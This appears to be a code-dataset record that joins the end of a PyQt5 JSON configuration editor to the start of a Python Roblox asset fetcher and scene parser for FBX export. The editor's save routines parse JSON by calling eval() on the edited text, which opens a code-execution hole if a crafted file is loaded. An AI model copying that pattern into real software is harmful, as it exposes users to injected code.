QtWidgets.QMessageBox.Yes)\n except IndexError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請先開啟一個檔案', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n\n def handleSelection(self, selected, deselected):\n for i, index in enumerate(selected.indexes()):\n item = self.tree_widget.itemFromIndex(index)\n column = self.tree_widget.currentColumn()\n edit = QtWidgets.QLineEdit()\n #i=0為key, i=1為value\n # print('i:', i, item.text(i))\n if column == 1 and str(item.text(0)) not in self.CANNOT_EDIT_VALUE:\n old = item.text(column)\n edit.setText(old)\n edit.returnPressed.connect(lambda *_: self.setData(edit, item, column, self.tree_widget, old))\n self.tree_widget.setItemWidget(item, column, edit)\n elif column == 0 and str(item.text(0)) in self.AI_FEATURES_SETS :\n old = item.text(column)\n edit.setText(old)\n edit.returnPressed.connect(lambda *_: self.setData(edit, item, column, self.tree_widget, old))\n self.tree_widget.setItemWidget(item, column, edit)\n # print('SEL: row: %s, col: %s, text: %s' % (\n # index.row(), index.column(), item.text(i)))\n\n def setData(self, edit, item, column, tree, old):\n item.setText(int(column), edit.text())\n key = item.text(0)\n print('key:', key)\n tree.setItemWidget(item, column, None)\n if item.parent():\n self.Case(item, old, edit.text(), key)\n self.data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(self.data1)\n\n def itemInsert(self):\n text, ok = QtWidgets.QInputDialog.getText(self, \"新增Child\", \"輸入child key值:\")\n if ok and text != \"\":\n try:\n if str(text) in self.VALID_KEYS or isinstance(int(text), int):\n if len(self.tree_widget.selectedItems()) > 0:\n QtWidgets.QTreeWidgetItem(self.tree_widget.selectedItems()[0], [text])\n else:\n QtWidgets.QTreeWidgetItem(self.tree_widget, [text])\n except:\n QtWidgets.QMessageBox.warning(self, 'Hint', '未知的key值', QtWidgets.QMessageBox.Yes)\n \n def itemDelete(self):\n for item in self.tree_widget.selectedItems():\n if str(item.text(0)) not in self.CAN_DELETE:\n try:\n if str(self.get_parent(item, 1).text(0)) not in self.CAN_DELETE_CHILD and str(self.get_parent(item, 2).text(0)) != 'ROI' and str(item.parent().text(0)) not in self.SETTINGS_KEYS:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n except:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n self.DCase(item, item.text(0))\n self.tree_widget.clear()\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(self.data, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.tree_widget.expandAll()\n self.data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(self.data1)\n \n def itemDuplicate(self):\n for item in self.tree_widget.selectedItems():\n if str(item.parent().text(0)) == 'config_set':\n content = self.data['config_set'][int(item.text(0))]\n self.data['config_set'].append(content) \n elif str(item.parent().text(0)) == 'AI_features':\n text, ok = QtWidgets.QInputDialog.getText(self, \"複製\", \"輸入key值:\")\n if ok and text != \"\":\n content = self.data['config_set'][int(self.get_parent(item, 2).text(0))]['AI_features']\n if str(text) not in self.VALID_KEYS:\n QtWidgets.QMessageBox.warning(self, 'Hint', '未知的Key值', QtWidgets.QMessageBox.Yes)\n return\n try:\n if content[str(text)]:\n QtWidgets.QMessageBox.warning(self, 'Hint', 'Key值已存在', QtWidgets.QMessageBox.Yes)\n return\n except Exception as e:\n print(e)\n content[str(text)] = content.copy()[item.text(0)]\n else:\n QtWidgets.QMessageBox.warning(self, 'Hint', '只有config_set和AI_features底下的child可被複製', QtWidgets.QMessageBox.Yes)\n return\n self.data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(self.data1)\n self.Save_textEdit()\n self.Reload()\n \n def Case(self,item, old, new, key):\n #讓key_set可改\n \n try:\n print('parent:', item.parent().text(0), old, new)\n \n if str(old) in self.AI_FEATURES_SETS:\n if str(new) in self.AI_FEATURES_SETS:\n AI_F = self.data['config_set'][int(self.get_parent(item, 2).text(0))]['AI_features']\n AI_F[str(new)] = AI_F.pop(str(old))\n return\n \n if str(item.parent().text(0)) in self.SETTINGS_KEYS:\n try:\n if self.data[str(self.get_parent(item, 1).text(0))][int(key)] is not None:\n self.data[str(self.get_parent(item, 1).text(0))][int(key)] = str(new)\n except IndexError:\n self.data[str(self.get_parent(item, 1).text(0))].append(str(new))\n return\n \n if str(key) == 'switch':\n self.data['switch'] = str(new)\n return\n \n if key in self.CONFIG_SET_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 1).text(0))]\n \n if str(key) == 'dps':\n content[str(key)] = int(new)\n \n else:\n content[str(key)] = str(new)\n \n return\n \n if key in self.AI_FEATURES_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 3).text(0))]\n AI_F = content['AI_features']\n try:\n AI_F_C = AI_F[str(item.parent().text(0))]\n if AI_F_C[str(key)] is not None:\n if str(key) == 'GPU_Index':\n AI_F_C[str(key)] = int(new)\n else:\n AI_F_C[str(key)] = str(new)\n print('done-2')\n except Exception as e:\n print(e)\n AI_F_C = AI_F[str(item.parent().text(0))]\n AI_F_C[str(key)] = str(new)\n \n return\n\n if key in self.ROIOBJ_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(item.parent().text(0))]\n try:\n if ROIObj[str(key)] is not None:\n ROIObj[str(key)] = str(new)\n print('done-3')\n except:\n ROIObj[str(key)] = str(new) \n return\n\n if str(self.get_parent(item, 2).text(0)) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 7).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 5).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(self.get_parent(item, 3).text(0))]\n ROI = ROIObj['ROI'][int(item.parent().text(0))]\n try:\n if ROI[int(key)] is not None:\n ROI[int(key)] = float(new) \n print('done-4')\n except IndexError:\n ROI.append(float(new))\n except IndexError:\n ROI = ROIObj['ROI']\n ROI.append([float(new)])\n #外面的ROI\n except ValueError:\n try:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROI = AI_F_C['ROI'][int(item.parent().text(0))]\n try:\n if ROI[int(key)] is not None:\n ROI[int(key)] = float(new)\n print('done-5')\n except Exception as e:\n ROI.append(float(new))\n except IndexError:\n ROI = AI_F_C['ROI']\n ROI.append([float(new)]) \n return\n \n if str(self.get_parent(item, 2).text(0)) == 'Threshold':\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n Threshold = AI_F_C['Threshold'][str(item.parent().text(0))]\n try:\n if Threshold[int(key)] is not None:\n Threshold[int(key)] = float(new)\n print('done-6')\n except:\n Threshold.append(float(new)) \n return\n except ValueError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '格式錯誤', QtWidgets.QMessageBox.Yes)\n return\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n return\n QtWidgets.QMessageBox.warning(self, 'Hint', '未知key值不會被儲存', QtWidgets.QMessageBox.Yes)\n \n def DCase(self, item, key):\n try:\n \n if str(self.get_parent(item, 1).text(0)) in self.SETTINGS_KEYS:\n if int(item.text(0)) == 0:\n QtWidgets.QMessageBox.warning(self, 'Hint', '說明文字無法刪除', QtWidgets.QMessageBox.Yes)\n return\n del self.data[str(self.get_parent(item, 1).text(0))][int(item.text(0))]\n \n if str(self.get_parent(item, 1).text(0)) == 'config_set':\n try:\n if self.data['config_set'][1] is not None:\n pass\n try:\n del self.data['config_set'][int(item.text(0))]\n except Exception as e:\n print(e)\n except IndexError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n\n #刪陣列整串\n if str(self.get_parent(item, 1).text(0)) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 6).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 4).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(self.get_parent(item, 2).text(0))]\n ROI = ROIObj['ROI']\n del ROI[int(item.text(0))]\n #外面的ROI\n except:\n content = self.data['config_set'][int(self.get_parent(item, 4).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 2).text(0))]\n ROI = AI_F_C['ROI']\n del ROI[int(item.text(0))]\n return\n #刪整串\n if str(key) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]['AI_features'][str(self.get_parent(item, 3).text(0))]['ROIObj'][int(self.get_parent(item, 1).text(0))]\n del content['ROI']\n #外面ROI\n except:\n content = self.data['config_set'][int(self.get_parent(item, 3).text(0))]['AI_features'][str(self.get_parent(item, 1).text(0))]\n del content['ROI']\n return\n \n if str(key) == 'switch':\n del self.data['switch']\n return\n \n if key in self.CONFIG_SET_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 1).text(0))]\n try:\n del content[str(key)]\n except Exception as e:\n print(e)\n return\n \n if key in self.AI_FEATURES_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 3).text(0))]\n AI_F = content['AI_features']\n try:\n AI_F_C = AI_F[str(item.parent().text(0))]\n del AI_F_C[str(key)]\n print('done-2')\n except Exception as e:\n print(e)\n return\n\n if key in self.ROIOBJ_KEYS:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(item.parent().text(0))]\n try:\n del ROIObj[str(key)] \n except Exception as e:\n print(e)\n return\n\n if str(self.get_parent(item, 2).text(0)) == 'ROI':\n #ROIObj裡的ROI\n try:\n content = self.data['config_set'][int(self.get_parent(item, 7).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 5).text(0))]\n ROIObj = AI_F_C['ROIObj'][int(self.get_parent(item, 3).text(0))]\n ROI = ROIObj['ROI'][int(item.parent().text(0))]\n ROI.remove(float(item.text(1)))\n \n #外面的ROI\n except ValueError:\n try:\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n ROI = AI_F_C['ROI'][int(item.parent().text(0))]\n ROI.remove(float(item.text(1))) \n except:\n pass\n return\n \n if str(self.get_parent(item, 2).text(0)) == 'Threshold':\n content = self.data['config_set'][int(self.get_parent(item, 5).text(0))]\n AI_F = content['AI_features']\n AI_F_C = AI_F[str(self.get_parent(item, 3).text(0))]\n Threshold = AI_F_C['Threshold'][str(item.parent().text(0))]\n try:\n if Threshold[1] is not None:\n pass\n try:\n Threshold.remove(float(item.text(1)))\n except:\n pass\n except:\n QtWidgets.QMessageBox.warning(self, 'Hint', '無法刪除', QtWidgets.QMessageBox.Yes)\n return\n\n #刪掉整組config_set\n if str(item.parent().text(0)) == 'config_set':\n content = self.data[str(item.parent().text(0))]\n try:\n del content[int(key)]\n except:\n del content[str(key)]\n return\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n # QtWidgets.QMessageBox.warning(self, 'Hint', 'Unknow key will not be saved.', QtWidgets.QMessageBox.Yes)\n\n def get_parent(self, item, times):\n parent = item.parent()\n for i in range(times-1):\n parent = parent.parent()\n return parent\n\n def restart(self):\n QtCore.QCoreApplication.quit()\n status = QtCore.QProcess.startDetached(sys.executable, sys.argv)\n\n def Save_textEdit(self):\n \n filename = self.filenames\n update = self.textEdit.toPlainText()\n \n try:\n data = eval(update)\n \n data_for_write = json.dumps(data, indent=5, ensure_ascii=False)\n \n with open(filename[0], 'w', encoding='utf-8') as f:\n f.write(data_for_write)\n f.close()\n QtWidgets.QMessageBox.information(self, 'Hint', '存檔完成', QtWidgets.QMessageBox.Yes)\n except IndexError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請先另存新檔', QtWidgets.QMessageBox.Yes)\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非正確的Json格式', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n self.Reload()\n\n def Save_as(self):\n try:\n text = self.textEdit.toPlainText()\n data = eval(text)\n data_for_write = json.dumps(data, indent=5, ensure_ascii=False)\n name = QtWidgets.QFileDialog.getSaveFileName(self, 'Save File')\n filename = str(name[0])\n file = open(filename, 'w', encoding='utf-8')\n file.write(data_for_write)\n file.close()\n QtWidgets.QMessageBox.information(self, 'Hint', '存檔完成', QtWidgets.QMessageBox.Yes)\n self.tree_widget.clear()\n with open(filename, 'r', encoding='utf-8') as f:\n self.data = json.load(f)\n data1 = json.dumps(self.data, indent=5, ensure_ascii=False)\n self.textEdit.setText(data1)\n jfile = open(filename)\n jdata = json.load(jfile, object_pairs_hook=collections.OrderedDict)\n root_item = QtWidgets.QTreeWidgetItem([\"Root\"])\n self.recurse_jdata(jdata, root_item)\n self.tree_widget.addTopLevelItem(root_item)\n self.table_gbox.setTitle(filename)\n self.tree_widget.expandAll()\n except FileNotFoundError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '請選取正確的路徑', QtWidgets.QMessageBox.Yes)\n except json.decoder.JSONDecodeError:\n QtWidgets.QMessageBox.warning(self, 'Hint', '非正確的Json格式', QtWidgets.QMessageBox.Yes)\n except Exception as e:\n print(e)\n QtWidgets.QMessageBox.warning(self, 'Hint', '發生錯誤', QtWidgets.QMessageBox.Yes)\n\n def recurse_jdata(self, jdata, tree_widget):\n if isinstance(jdata, dict): #isinstance用來判斷jdata是否為dict\n for key, val in jdata.items():\n self.tree_add_row(key, val, tree_widget)\n elif isinstance(jdata, list):\n for i, val in enumerate(jdata):\n key = str(i)\n self.tree_add_row(key, val, tree_widget)\n else:\n pass\n\n def tree_add_row(self, key, val, tree_widget):\n if isinstance(val, dict) or isinstance(val, list):#如果為還能拆解的dict, list 就再送回去拆解\n row_item = QtWidgets.QTreeWidgetItem([key])\n self.recurse_jdata(val, row_item)\n else:\n row_item = QtWidgets.QTreeWidgetItem([key, str(val)])\n tree_widget.addChild(row_item)#add on tree\n\n def find_word(self):\n words = self.find_lineEdit.text()\n if not self.textEdit.find(words):\n cursor = self.textEdit.textCursor()\n cursor.setPosition(0)\n self.textEdit.setTextCursor(cursor)\n self.textEdit.find(words)\n\nclass JsonViewer(QtWidgets.QMainWindow):\n\n def __init__(self):\n super(JsonViewer, self).__init__()\n json_view = JsonView()\n self.setCentralWidget(json_view)\n self.setWindowTitle(\"Beseye Config JSON Editor\")\n self.setMinimumSize(950, 600)\n self.show()\n\nif \"__main__\" == __name__:\n qt_app = QtWidgets.QApplication(sys.argv)\n json_viewer = JsonViewer()\n sys.exit(qt_app.exec_())","repo_name":"necrotic7/Json-Editor-PyQt5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":29518,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5884822642","text":"import math\nimport io\nimport sys\nimport os\nimport signal\nimport json\nimport gzip\nimport hashlib\nimport time\nimport fbx\nimport rbmesh\nimport logger\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nimport email.utils as email_utils\nimport urllib.request\nimport urllib.error\n\n\ndef ensure_path_exist(file_path: str) -> str:\n dir_name = os.path.dirname(file_path)\n if not os.path.isdir(dir_name):\n os.makedirs(dir_name)\n return dir_name\n\n\ndef detect_asset_type(content: bytes) -> str:\n\n if len(content) > 8:\n data_stream = io.BytesIO(content)\n header = data_stream.read(8)\n ktx_header = b'\\xab\\x4b\\x54\\x58\\x20\\x31\\x31\\xbb'\n if header == ktx_header:\n return 'ktx'\n\n # ascii mesh\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 1.00'\n if header == mesh_v1_header:\n return 'mesh'\n\n # ascii mesh\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 1.01'\n if header == mesh_v1_header:\n return 'mesh'\n\n # binary mesh\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 2.00'\n if header == mesh_v1_header:\n return 'mesh'\n\n # binary mesh with LODs\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v1_header = b'version 3.00'\n if header == mesh_v1_header:\n return 'mesh'\n\n # binary mesh with LODs and skinning data\n if len(content) > 12:\n data_stream = io.BytesIO(content)\n header = data_stream.read(12)\n mesh_v4_header = b'version 4.00'\n if header == mesh_v4_header:\n return 'mesh'\n mesh_v41_header = b'version 4.01'\n if header == mesh_v41_header:\n return 'mesh'\n\n if len(content) > 8:\n data_stream = io.BytesIO(content)\n header = data_stream.read(8)\n png_header = b'\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A'\n if header == png_header:\n return 'png'\n\n if len(content) > 10:\n data_stream = io.BytesIO(content)\n header = data_stream.read(1)\n _ = data_stream.read(5)\n signature = data_stream.read(4)\n if header == b'\\xFF' and signature == b'\\x4A\\x46\\x49\\x46':\n return 'jpg'\n\n if len(content) > 32:\n data_stream = io.BytesIO(content)\n header = data_stream.read(3)\n if header == b'\\x44\\x44\\x53':\n return 'dds'\n return 'raw'\n\n\ndef fetch_local_asset(file_path: str):\n\n with open(file_path, 'rb') as bin_file:\n data = bin_file.read()\n bin_file.close()\n\n h256 = hashlib.sha256()\n h256.update(data)\n\n return {\"hash\": h256.hexdigest(),\n \"cdn_url\": file_path,\n \"ts\": int(0),\n \"code\": 200,\n \"fetched_bytes\": len(data),\n \"payload_bytes\": len(data),\n \"payload\": data}, None\n\n\ndef fetch_asset(url: str) -> dict or None:\n if not url:\n return None, \"Invalid URL\"\n\n if url.startswith('rbxasset://'):\n url = \"./built-in/\" + url[11:]\n return fetch_local_asset(url)\n\n asset_fetch_endpoint = 'https://assetdelivery.roblox.com/v1/asset/?id='\n if url.startswith('rbxassetid://'):\n url = asset_fetch_endpoint + url[13:]\n elif url.startswith('https://www.roblox.com/asset/?id='):\n url = asset_fetch_endpoint + url[33:]\n elif url.startswith('http://roblox.com/asset/?id='):\n url = asset_fetch_endpoint + url[28:]\n elif url.startswith('http://www.roblox.com/asset/?id='):\n url = asset_fetch_endpoint + url[32:]\n\n try:\n request = urllib.request.Request(url)\n request.add_header('Roblox-Place-Id', '0')\n request.add_header('Accept-Encoding', 'gzip')\n request.add_header('User-Agent', 'RobloxStudio/WinInet')\n\n # noinspection PyUnusedLocal\n fetched_bytes = 0\n response = urllib.request.urlopen(request)\n if response.info().get('Content-Encoding') == 'gzip':\n compressed_data = response.read()\n fetched_bytes = len(compressed_data)\n data = gzip.decompress(compressed_data)\n else:\n data = response.read()\n fetched_bytes = len(data)\n\n cdn_url = str(response.geturl())\n\n h256 = hashlib.sha256()\n h256.update(data)\n\n html_timestamp = response.info().get('Last-Modified')\n timestamp = int(time.mktime(email_utils.parsedate(html_timestamp)))\n\n return {\"hash\": h256.hexdigest(),\n \"cdn_url\": cdn_url,\n \"ts\": timestamp,\n \"code\": response.getcode(),\n \"fetched_bytes\": fetched_bytes,\n \"payload_bytes\": len(data),\n \"payload\": data}, None\n\n except urllib.error.HTTPError as ex:\n logger.warn(\"Can't fetch asset '\" + url + \"'\")\n logger.warn(\"Code: \" + str(ex.getcode()))\n logger.warn(\"Exception: '\" + str(ex) + \"'\")\n return None, str(ex)\n except ValueError as ex:\n logger.warn(\"ValueError. Can't fetch asset \" + url)\n logger.warn(\"Exception: '\" + str(ex) + \"'\")\n return None, str(ex)\n except urllib.error.URLError as ex:\n logger.warn(\"URLError. Can't fetch asset \" + url)\n logger.warn(\"Exception: '\" + str(ex) + \"'\")\n return None, str(ex)\n\n\ndef resolve_id_to_reference(object_id: int, id_to_object: dict):\n if object_id == -1:\n return None\n else:\n return id_to_object.get(object_id, None)\n\n\nclass SceneDescription:\n def __init__(self):\n self.textures_folder = \"\"\n self.attachments_layer_id = 0\n self.bones_layer_id = 0\n self.geos_layer_id = 0\n self.accs_layer_id = 0\n self.attachments_material_id = 0\n\n\nclass Connection:\n def __init__(self, is_active, part0, part1):\n self.active = is_active\n self.part0 = part0\n self.part1 = part1\n\n\nclass CFrame:\n def __init__(self):\n self.tx = 0\n self.ty = 0\n self.tz = 0\n self.r00 = 1\n self.r01 = 0\n self.r02 = 0\n self.r10 = 0\n self.r11 = 1\n self.r12 = 0\n self.r20 = 0\n self.r21 = 0\n self.r22 = 1\n\n\ndef cframe_rotation_x(rad: float) -> CFrame:\n cos = math.cos(rad)\n sin = math.sin(rad)\n res = CFrame()\n res.r11 = cos\n res.r12 = -sin\n res.r21 = sin\n res.r22 = cos\n return res\n\n\ndef cframe_translation(x: float, y: float, z: float) -> CFrame:\n res = CFrame()\n res.tx = x\n res.ty = y\n res.tz = z\n return res\n\n\ndef cframe_rotation_y(rad: float) -> CFrame:\n cos = math.cos(rad)\n sin = math.sin(rad)\n res = CFrame()\n res.r00 = cos\n res.r02 = sin\n res.r20 = -sin\n res.r22 = cos\n return res\n\n\ndef cframe_rotation_z(rad: float) -> CFrame:\n cos = math.cos(rad)\n sin = math.sin(rad)\n res = CFrame()\n res.r00 = cos\n res.r01 = -sin\n res.r10 = sin\n res.r11 = cos\n return res\n\n\ndef cframe_roblox_to_maya(cframe: CFrame) -> CFrame:\n res = CFrame()\n res.r00 = cframe.r00\n res.r01 = cframe.r01\n res.r02 = cframe.r02\n res.r10 = cframe.r10\n res.r11 = cframe.r11\n res.r12 = cframe.r12\n res.r20 = cframe.r20\n res.r21 = cframe.r21\n res.r22 = cframe.r22\n res.tx = -cframe.tx\n res.ty = cframe.ty\n res.tz = -cframe.tz\n return res\n\n\ndef cframe_inverse(cframe: CFrame) -> CFrame:\n res = CFrame()\n\n # transposition\n res.r00 = cframe.r00\n res.r01 = cframe.r10\n res.r02 = cframe.r20\n\n res.r10 = cframe.r01\n res.r11 = cframe.r11\n res.r12 = cframe.r21\n\n res.r20 = cframe.r02\n res.r21 = cframe.r12\n res.r22 = cframe.r22\n\n res.tx = -(res.r00 * cframe.tx + res.r01 * cframe.ty + res.r02 * cframe.tz)\n res.ty = -(res.r10 * cframe.tx + res.r11 * cframe.ty + res.r12 * cframe.tz)\n res.tz = -(res.r20 * cframe.tx + res.r21 * cframe.ty + res.r22 * cframe.tz)\n\n return res\n\n\ndef cframe_multiply(a: CFrame, b: CFrame) -> CFrame:\n\n # 3x3 matrix multiplication\n res = CFrame()\n res.r00 = a.r00 * b.r00 + a.r01 * b.r10 + a.r02 * b.r20\n res.r01 = a.r00 * b.r01 + a.r01 * b.r11 + a.r02 * b.r21\n res.r02 = a.r00 * b.r02 + a.r01 * b.r12 + a.r02 * b.r22\n\n res.r10 = a.r10 * b.r00 + a.r11 * b.r10 + a.r12 * b.r20\n res.r11 = a.r10 * b.r01 + a.r11 * b.r11 + a.r12 * b.r21\n res.r12 = a.r10 * b.r02 + a.r11 * b.r12 + a.r12 * b.r22\n\n res.r20 = a.r20 * b.r00 + a.r21 * b.r10 + a.r22 * b.r20\n res.r21 = a.r20 * b.r01 + a.r21 * b.r11 + a.r22 * b.r21\n res.r22 = a.r20 * b.r02 + a.r21 * b.r12 + a.r22 * b.r22\n\n res.tx = a.r00 * b.tx + a.r01 * b.ty + a.r02 * b.tz + a.tx\n res.ty = a.r10 * b.tx + a.r11 * b.ty + a.r12 * b.tz + a.ty\n res.tz = a.r20 * b.tx + a.r21 * b.ty + a.r22 * b.tz + a.tz\n\n return res\n\n\ndef cframe_transform_pos(cframe: CFrame, x: float, y: float, z: float):\n rx = cframe.r00 * x + cframe.r01 * y + cframe.r02 * z + cframe.tx\n ry = cframe.r10 * x + cframe.r11 * y + cframe.r12 * z + cframe.ty\n rz = cframe.r20 * x + cframe.r21 * y + cframe.r22 * z + cframe.tz\n return rx, ry, rz\n\n\ndef cframe_transform_vec(cframe: CFrame, x: float, y: float, z: float):\n rx = cframe.r00 * x + cframe.r01 * y + cframe.r02 * z\n ry = cframe.r10 * x + cframe.r11 * y + cframe.r12 * z\n rz = cframe.r20 * x + cframe.r21 * y + cframe.r22 * z\n return rx, ry, rz\n\n\nclass Instance:\n def __init__(self):\n self.name = \"\"\n self.parent = None\n self.children = list()\n\n def resolve(self, id_to_object: dict):\n self.parent = resolve_id_to_reference(self.parent, id_to_object)\n return\n\n\nclass Part(Instance):\n def __init__(self):\n super().__init__()\n self.sx = 1\n self.sy = 1\n self.sz = 1\n self.cframe = CFrame()\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass MeshPart(Instance):\n def __init__(self):\n super().__init__()\n self.mesh_id = \"\"\n self.mesh_type = \"\"\n self.texture_id = \"\"\n self.cframe = CFrame()\n self.texture_blob = None\n self.mesh_blob = None\n self.offset_x = 0\n self.offset_y = 0\n self.offset_z = 0\n self.scale_x = 1\n self.scale_y = 1\n self.scale_z = 1\n self.size_x = 1\n self.size_y = 1\n self.size_z = 1\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass Model(Instance):\n def __init__(self):\n super().__init__()\n self.primary_part = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n self.primary_part = resolve_id_to_reference(self.primary_part, id_to_object)\n return\n\n\nclass Bone(Instance):\n def __init__(self):\n super().__init__()\n self.cframe = CFrame()\n self.m6d = None\n self.cframe_local = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass Attachment(Instance):\n def __init__(self):\n super().__init__()\n self.cframe = CFrame()\n self.geo = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n return\n\n\nclass Accessory(Instance):\n def __init__(self):\n super().__init__()\n self.attach_point = CFrame()\n\n\nclass Motor6D(Instance):\n def __init__(self):\n super().__init__()\n self.transform = CFrame()\n self.c0 = CFrame()\n self.c1 = CFrame()\n self.part0 = None\n self.part1 = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n self.part0 = resolve_id_to_reference(self.part0, id_to_object)\n self.part1 = resolve_id_to_reference(self.part1, id_to_object)\n return\n\n\nclass Weld(Instance):\n def __init__(self):\n super().__init__()\n self.part0 = None\n self.part1 = None\n\n def resolve(self, id_to_object: dict):\n super().resolve(id_to_object)\n self.part0 = resolve_id_to_reference(self.part0, id_to_object)\n self.part1 = resolve_id_to_reference(self.part1, id_to_object)\n return\n\n\ndef get_cframe(json_cframe) -> CFrame:\n res = CFrame()\n res.tx = json_cframe.get('tx', 0)\n res.ty = json_cframe.get('ty', 0)\n res.tz = json_cframe.get('tz', 0)\n res.r00 = json_cframe.get('r00', 1)\n res.r01 = json_cframe.get('r01', 0)\n res.r02 = json_cframe.get('r02', 0)\n res.r10 = json_cframe.get('r10', 0)\n res.r11 = json_cframe.get('r11', 1)\n res.r12 = json_cframe.get('r12', 0)\n res.r20 = json_cframe.get('r20', 0)\n res.r21 = json_cframe.get('r21', 0)\n res.r22 = json_cframe.get('r22', 1)\n return res\n\n\ndef parse_model_desc(model_desc) -> Instance or None:\n\n objects = list()\n id_to_object = dict()\n\n # 1st pass - parse desc and instantiate objects\n for key, dm_object in model_desc.items():\n obj = None\n obj_class = dm_object.get('Class', None)\n assert obj_class is not None\n if obj_class == \"Model\":\n obj = Model()\n obj.primary_part = dm_object.get('PrimaryPart', -1)\n elif obj_class == \"Part\":\n obj = Part()\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n obj.sx = dm_object.get('SizeX', 1)\n obj.sy = dm_object.get('SizeY', 1)\n obj.sz = dm_object.get('SizeZ', 1)\n elif obj_class == \"MeshPart\":\n obj = MeshPart()\n obj.mesh_id = dm_object.get('MeshId', '')\n obj.texture_id = dm_object.get('TextureId', '')\n obj.mesh_type = dm_object.get('MeshType', 'Unsupported')\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n\n obj.offset_x = dm_object.get('OffsetX', 1)\n obj.offset_y = dm_object.get('OffsetY', 1)\n obj.offset_z = dm_object.get('OffsetZ', 1)\n\n obj.scale_x = dm_object.get('ScaleX', 1)\n obj.scale_y = dm_object.get('ScaleY', 1)\n obj.scale_z = dm_object.get('ScaleZ', 1)\n\n obj.size_x = dm_object.get('SizeX', 1)\n obj.size_y = dm_object.get('SizeY', 1)\n obj.size_z = dm_object.get('SizeZ', 1)\n elif obj_class == \"Bone\":\n obj = Bone()\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n elif obj_class == \"Attachment\":\n obj = Attachment()\n obj.cframe = get_cframe(dm_object.get('CFrame', CFrame()))\n elif obj_class == \"WeldConstraint\":\n obj = Weld()\n obj.part0 = dm_object.get('Part0', -1)\n obj.part1 = dm_object.get('Part1', -1)\n elif obj_class == \"Motor6D\":\n obj = Motor6D()\n obj.part0 = dm_object.get('Part0', -1)\n obj.part1 = dm_object.get('Part1', -1)\n obj.c0 = get_cframe(dm_object.get('C0', CFrame()))\n 